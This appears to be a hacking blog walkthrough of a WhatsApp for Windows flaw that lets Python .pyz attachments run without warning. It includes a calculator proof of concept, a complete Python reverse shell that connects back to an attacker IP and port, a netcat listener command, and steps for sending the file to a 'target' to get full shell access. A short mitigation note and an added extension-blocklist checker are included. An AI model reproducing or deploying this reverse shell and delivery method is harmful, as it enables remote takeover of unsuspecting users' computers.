Hacking Windows via WhatsApp Messenger RCE


In July 2024, the reputed cybersecurity blog Bleeping Computer reported that the latest version of WhatsApp for Windows lets Python and PHP scripts execute without any warning.


A similar issue was also found in Telegram in April and was later patched: attackers could execute a malicious Python file with the .pyz extension to get access to the running Windows machine. The condition for the attack to succeed was that Python must be installed on the Windows machine.

Further, a security researcher named Saumyajeet Das tested the same bug on WhatsApp Messenger and found that while WhatsApp was blocking multiple file types, including .EXE, .COM, .SCR, .BAT, .PS1, .DLL, .HTA and .VBS, it was allowing Python extensions like .PYZ (Python ZIP app) and .PYZW (PyInstaller program), along with PHP scripts and .EVTX (Windows event log file).

So, in this article we will test the same vulnerability in the latest version of WhatsApp Messenger for Windows. On that note, let's get started.

Preparing the Environment:

  • For the demonstration, I have downloaded the latest version of WhatsApp Messenger from the Microsoft Store, which is 2.2439.7.0.

WhatsApp version

  • I have logged in using my personal WhatsApp account.

WhatsApp chat

Testing the Bug:

  • Now if I drag and drop the calc.exe file into the chat box and try to run it directly using the “open” button, I see the “Save failed” message. That means WhatsApp is blocking executable file types.

calc.exe

Save failed

  • Next, I tried a PowerShell script that also pops up a calculator. Again, I got a “Save failed” message.

# Powershell script to pop-up calculator

powershell -ep bypass
Start-Process calc

script.ps1

Save failed

  • Now let's try the alleged Python extension, .pyz. I have created a file with the following code that will pop up the calculator if all goes well, but before that, make sure that Python is installed on your system.

# Python code to pop-up calculator

import os
os.system("calc.exe")

calc.pyz

Calculator App

  • Voila! The calculator popped up. That means code execution is working on the latest version of WhatsApp. Now, let's fully compromise this Windows machine.

Gaining God Access on target:

  • To get full access on the target, we will now use a Python-based reverse shell. I am using the code below to spawn a reverse shell on the target.

import socket
import os
import threading
import subprocess as sp

ip_addr = '192.168.29.160'  # Attack machine IP
port = 7777                 # Listener Port

# Set up the subprocess to run cmd.exe
p = sp.Popen(['cmd.exe'], stdin=sp.PIPE, stdout=sp.PIPE, stderr=sp.STDOUT)

# Create a socket and connect to the specified address and port
s = socket.socket()
s.connect((ip_addr, port))

# Define the function to read from the subprocess stdout and send to the socket
def read_and_send():
    while True:
        o = os.read(p.stdout.fileno(), 1024)
        s.send(o)

# Define the function to receive from the socket and write to the subprocess stdin
def recv_and_write():
    while True:
        i = s.recv(1024)
        os.write(p.stdin.fileno(), i)

# Start the threads to run the above functions
threading.Thread(target=read_and_send, daemon=True).start()
threading.Thread(target=recv_and_write).start()

  • Before executing our shell.pyz on the target, let's set up our netcat listener on port 7777.

nc -lvnp 7777

netcat listener

  • Now let's share the file with the target on WhatsApp, and once he clicks on open, boom! We get shell access on the target and can now do whatever we want.

shell.pyz

Full shell access


Conclusion:


So, we just saw that this vulnerability is still valid in the wild and there is no fix for it. As per the article, Saumyajeet has already reported this to Meta, and they acknowledged the vulnerability but have not taken immediate action to address it, instead placing the onus on users to avoid opening unknown files. This response has drawn criticism, especially considering the potential for malicious exploitation through shared attachments in both private and public chats.

In my opinion, this can be easily mitigated by updating the file-upload filtering list in WhatsApp and adding these Python- and PHP-based extensions to it to avoid further exploitation. On that note, I will take my leave and will meet you in the next one. Till then, “Happy Hacking!”.
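The filter update suggested above, sketched as an added example (not WhatsApp's code and not from the original article): it checks constructed attachment names against the blocklist the article describes and against one extended with the extensions it reports as still allowed. The function names and sample file names are assumptions made for illustration.

```python
# Extensions the article says WhatsApp for Windows already refuses to open.
BLOCKED_PER_ARTICLE = {".exe", ".com", ".scr", ".bat", ".ps1", ".dll", ".hta", ".vbs"}
# Extensions the article reports as still allowed, added per the suggested fix.
MISSING_PER_ARTICLE = {".pyz", ".pyzw", ".php", ".evtx"}
HARDENED = BLOCKED_PER_ARTICLE | MISSING_PER_ARTICLE


def effective_extension(filename):
    """Return the extension Windows would use to pick a handler, lowercased."""
    # Drop any path component the sender may have embedded in the name.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    # Windows ignores trailing dots and spaces; extensions are case-insensitive.
    name = name.rstrip(". ").lower()
    # Only the last extension matters ("report.pdf.pyzw" opens as .pyzw), and a
    # name that is nothing but an extension (".pyz") still counts.
    dot = name.rfind(".")
    return name[dot:] if dot != -1 else ""


def is_blocked(filename, blocklist):
    """True if the attachment's effective extension is on the blocklist."""
    return effective_extension(filename) in blocklist


def audit(filenames, blocklist):
    """Return the names that would still be offered for direct opening."""
    return [f for f in filenames if not is_blocked(f, blocklist)]


# Constructed sample attachment names (not taken from a real chat).
SAMPLES = ["calc.exe", "script.ps1", "calc.pyz", "shell.PYZ",
           "report.pdf.pyzw", "index.php. ", "Security.evtx", "holiday.jpg"]

if __name__ == "__main__":
    print("passes article's blocklist:", audit(SAMPLES, BLOCKED_PER_ARTICLE))
    print("passes hardened blocklist: ", audit(SAMPLES, HARDENED))
```

A blocklist only covers the extensions someone thought to list; any other file type with a registered handler on the recipient's machine still passes it.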
